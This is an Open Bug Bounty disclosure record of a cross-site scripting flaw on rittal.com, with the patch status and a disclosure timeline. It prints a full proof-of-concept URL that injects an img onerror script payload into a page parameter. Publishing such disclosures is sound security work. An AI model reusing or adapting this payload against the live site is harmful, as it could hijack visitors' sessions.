rittal.com XSS vulnerability

2017-08-23T23:11:00
ID OBB:281726
Type openbugbounty
Reporter eb
Modified 2017-11-21T23:22:00

Description

Vulnerable URL:
https://www.rittal.com/de-de/content/de/unternehmen/produktionssttten/company_overlay.jsp?name=%22%3Etrolo%3Ci%3Etralala%3Cimg%20src=x%20onerror=prompt(/OPENBUGBOUNTY/)%3E&assetid;=4_8464&adress;=%3CCMS_VALUE+name%3D%22cs_address%22+tag%3D%22CMS_INPUT_DOM%22%3E%3CLANG+id%3D%22%C2%A7%22+set%3D%221%22%3E%3CDOM%3E%3Caddress%3EDieselstra%C3%9Fe+32%3C%2Faddress%3E%3Caddress%3ED-85748+Garching%3C%2Faddress%3E%3C%2FDOM%3E%3C%2FLANG%3E%3C%2FCMS_VALUE%3E☎=%2B49%20(0)%2089%20326753-0&fax;=&email;=&url;=

Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 21.11.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank:| 70750
VIP website status:| No
Check rittal.com SSL connection:| (Grade: A+)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 23 August, 2017 23:11 GMT
Generic security notifications sent to website owner| 23 August, 2017 23:14 GMT
Notification sent to subscribers (without technical details)| 24 August, 2017 02:17 GMT
Vulnerability details disclosed by researcher| 21 November, 2017 23:22 GMT